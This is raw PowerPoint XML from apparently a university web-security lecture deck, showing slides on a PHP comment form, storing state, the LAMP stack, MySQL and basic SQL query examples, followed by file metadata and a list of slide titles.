                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;form method=POST&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      &lt;input type="text" name="name"&gt;&lt;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&lt;input type="text" name="comment"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      &lt;input type="submit" name="submit" value="Submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3711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Storing State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications would like to store persistent state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Otherwise it's hard to make a real application, as cookies can only store small amounts of information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where to store the state?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Previous JSP example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filesystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common for modern web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9879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Web Applications and the Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ACID compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concurrency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separation of concerns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can run database on another server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can have multiple web application processes connecting to the same database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More complicated to build and deploy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding another language to web technology (SQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67620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LAMP Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classic web application model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>inux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nice way to think of web applications, as each component can be mixed and swapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underlying OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web application language/framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4303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MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Currently second-most used open-source  relational database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the first?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First release on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>May 23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1995</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same day that Sun released first version of Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sun eventually purchased MySQL (the company) for $1 billion in January 2008 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="628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97000" y="1346200"/>
            <a:ext cx="6350000" cy="4165600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718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Structured Query Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special purpose language to interact with a relational database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some slight differences between SQL implementations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT * FROM Users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT * FROM Book WHERE price &gt; 100.00 ORDER BY title;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, title, price FROM  Book WHERE price &lt; (SELECT AVG(price) FROM Book) ORDER BY title;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>INSERT INTO example (field1, field2, field3) VALUES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('test', 'N', NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>UPDATE example SET field1 = 'updated value' WHERE field2 = 'N';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(SELECT a FROM t1 WHERE a=10 AND B=1 ORDER BY a LIMIT 10) UNION (SELECT a FROM t2 WHERE a=11 AND B=2 ORDER BY a LIMIT 10);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15408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dam_seclab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headEnd type="none"/>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99267</TotalTime>
  <Words>14120</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>2050</Paragraphs>
  <Slides>291</Slides>
  <Notes>53</Notes>
  <HiddenSlides>19</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291</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="300" baseType="lpstr">
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Eurostile</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>adam_seclab_theme</vt:lpstr>
      <vt:lpstr>Web Insecurity</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sir Tim Berners-Lee</vt:lpstr>
      <vt:lpstr>Birth of the Web</vt:lpstr>
      <vt:lpstr>Design</vt:lpstr>
      <vt:lpstr>Three Central Questions</vt:lpstr>
      <vt:lpstr>Three Central Technologies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Uniform Resource Identifier</vt:lpstr>
      <vt:lpstr>URI – Syntax </vt:lpstr>
      <vt:lpstr>URI – Syntax</vt:lpstr>
      <vt:lpstr>URI – Syntax </vt:lpstr>
      <vt:lpstr>URI – Reserved Characters</vt:lpstr>
      <vt:lpstr>URI – Percent Encoding</vt:lpstr>
      <vt:lpstr>URI – Percent Encoding</vt:lpstr>
      <vt:lpstr>URI – Absolute vs. Relative</vt:lpstr>
      <vt:lpstr>Hypertext Transport Protocol</vt:lpstr>
      <vt:lpstr>HTTP – Overview</vt:lpstr>
      <vt:lpstr>HTTP – Overview </vt:lpstr>
      <vt:lpstr>HTTP – Overview </vt:lpstr>
      <vt:lpstr>Requests</vt:lpstr>
      <vt:lpstr>Requests – Syntax</vt:lpstr>
      <vt:lpstr>Requests – Methods</vt:lpstr>
      <vt:lpstr>Requests – Methods</vt:lpstr>
      <vt:lpstr>Requests – Example</vt:lpstr>
      <vt:lpstr>Modern Requests</vt:lpstr>
      <vt:lpstr>Responses</vt:lpstr>
      <vt:lpstr>Responses – Syntax</vt:lpstr>
      <vt:lpstr>Responses – Status Codes</vt:lpstr>
      <vt:lpstr>Responses – Status Codes</vt:lpstr>
      <vt:lpstr>Responses – Status Codes</vt:lpstr>
      <vt:lpstr>Requests – Example</vt:lpstr>
      <vt:lpstr>Responses – Example</vt:lpstr>
      <vt:lpstr>HTTP Authentication</vt:lpstr>
      <vt:lpstr>HTTP Basic Authentication</vt:lpstr>
      <vt:lpstr>HTTP 1.1 Authentication</vt:lpstr>
      <vt:lpstr>Monitoring and Modifying HTTP Traffic</vt:lpstr>
      <vt:lpstr>Hypertext Markup Language</vt:lpstr>
      <vt:lpstr>HTML – Overview</vt:lpstr>
      <vt:lpstr>HTML – Tags </vt:lpstr>
      <vt:lpstr>HTML – Tags </vt:lpstr>
      <vt:lpstr>HTML – Tags </vt:lpstr>
      <vt:lpstr>HTML – Tags </vt:lpstr>
      <vt:lpstr>HTML – Hyperlink</vt:lpstr>
      <vt:lpstr>HTML – Basic HTML 5 Page</vt:lpstr>
      <vt:lpstr>HTML – Browsers</vt:lpstr>
      <vt:lpstr>HTML – Parsed HTML 5 Page</vt:lpstr>
      <vt:lpstr>HTML – Parsed HTML 5 Page</vt:lpstr>
      <vt:lpstr>HTML – Character References</vt:lpstr>
      <vt:lpstr>HTML – Character References Example</vt:lpstr>
      <vt:lpstr>HTML – Character References Example</vt:lpstr>
      <vt:lpstr>HTML – Character References Example</vt:lpstr>
      <vt:lpstr>HTML – Forms </vt:lpstr>
      <vt:lpstr>HTML – Forms</vt:lpstr>
      <vt:lpstr>HTML – Forms</vt:lpstr>
      <vt:lpstr>application/x-www-form-urlencoded</vt:lpstr>
      <vt:lpstr>application/x-www-form-urlencoded</vt:lpstr>
      <vt:lpstr>application/x-www-form-urlencoded</vt:lpstr>
      <vt:lpstr>Web Applications</vt:lpstr>
      <vt:lpstr>Web Applications</vt:lpstr>
      <vt:lpstr>Maintaining State</vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies</vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies</vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies</vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies</vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies </vt:lpstr>
      <vt:lpstr>Embedding Information in Cookies </vt:lpstr>
      <vt:lpstr>Modern Sessions</vt:lpstr>
      <vt:lpstr>Designing Web Applications</vt:lpstr>
      <vt:lpstr>Web Application Overview </vt:lpstr>
      <vt:lpstr>Active Server Pages (ASP)</vt:lpstr>
      <vt:lpstr>ASP Example</vt:lpstr>
      <vt:lpstr>Web Application Frameworks</vt:lpstr>
      <vt:lpstr>Web Application Frameworks</vt:lpstr>
      <vt:lpstr>PHP: Hypertext Preprocessor</vt:lpstr>
      <vt:lpstr>PHP – Popularity</vt:lpstr>
      <vt:lpstr>PHP</vt:lpstr>
      <vt:lpstr>PHP – Example</vt:lpstr>
      <vt:lpstr>PHP – Features</vt:lpstr>
      <vt:lpstr>PHP – String Variable Substitution</vt:lpstr>
      <vt:lpstr>PHP – Dynamic include/require</vt:lpstr>
      <vt:lpstr>wp-blog-header.php</vt:lpstr>
      <vt:lpstr>allow_url_include</vt:lpstr>
      <vt:lpstr>PHP - Superglobals</vt:lpstr>
      <vt:lpstr>PHP – Variable Variables</vt:lpstr>
      <vt:lpstr>PHP – register_globals</vt:lpstr>
      <vt:lpstr>PHP – register_globals</vt:lpstr>
      <vt:lpstr>Storing State</vt:lpstr>
      <vt:lpstr>Web Applications and the Database</vt:lpstr>
      <vt:lpstr>LAMP Stack</vt:lpstr>
      <vt:lpstr>MySQL</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Structured Query Language</vt:lpstr>
      <vt:lpstr>SQL Examples</vt:lpstr>
      <vt:lpstr>PHP and MySQL</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTML Design</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>DOM Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Using the DOM</vt:lpstr>
      <vt:lpstr>Browser Object Model (BOM)</vt:lpstr>
      <vt:lpstr>JavaScript vs. DOM and BOM</vt:lpstr>
      <vt:lpstr>JavaScript – Object-based</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JavaScript – Recursion</vt:lpstr>
      <vt:lpstr>JavaScript – Anonymous Functions and Closures</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JavaScript – Run-Time Evaluation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JavaScript Uses – Form Validation</vt:lpstr>
      <vt:lpstr>JavaScript Uses – Form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JavaScript Uses – Form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Client-Side Validation</vt:lpstr>
      <vt:lpstr>The XMLHttpRequest Object</vt:lpstr>
      <vt:lpstr>The XMLHttpRequest Object</vt:lpstr>
      <vt:lpstr>Creating an XMLHttpRequest</vt:lpstr>
      <vt:lpstr>XMLHttpRequest Lifecycle</vt:lpstr>
      <vt:lpstr>XMLHttpRequest Success</vt:lpstr>
      <vt:lpstr>XMLHttpRequest Example</vt:lpstr>
      <vt:lpstr>XMLHttpRequest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XMLHttpRequest with jQuery</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Asynchronous JavaScript and XML – AJAX </vt:lpstr>
      <vt:lpstr>How to Design a Web Application</vt:lpstr>
      <vt:lpstr>"Natural" PHP code</vt:lpstr>
      <vt:lpstr>"Natural" PHP code</vt:lpstr>
      <vt:lpstr>"Natural" PHP code</vt:lpstr>
      <vt:lpstr>Spaghetti Code</vt:lpstr>
      <vt:lpstr>Tight Coupling of URLs to Scripts</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Model-View-Controller</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Separation of Concerns</vt:lpstr>
      <vt:lpstr>Object Relational Mapping</vt:lpstr>
      <vt:lpstr>Routing</vt:lpstr>
      <vt:lpstr>Routing</vt:lpstr>
      <vt:lpstr>Templating</vt:lpstr>
      <vt:lpstr>Web Ecosystem</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Who's Security is it Anyways?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTML Frames</vt:lpstr>
      <vt:lpstr>frameset</vt:lpstr>
      <vt:lpstr>The Frames</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>iframes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JavaScript Security</vt:lpstr>
      <vt:lpstr>Same Origin Policy (SOP)</vt:lpstr>
      <vt:lpstr>Storing Information</vt:lpstr>
      <vt:lpstr>Tampering with Client-Side Information</vt:lpstr>
      <vt:lpstr>Hidden Form Fields</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How to approach</vt:lpstr>
      <vt:lpstr>Let's hack it!</vt:lpstr>
      <vt:lpstr>Hacking</vt:lpstr>
      <vt:lpstr>Hacking</vt:lpstr>
      <vt:lpstr>Hacking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTTP Cookies</vt:lpstr>
      <vt:lpstr>URL Parameters</vt:lpstr>
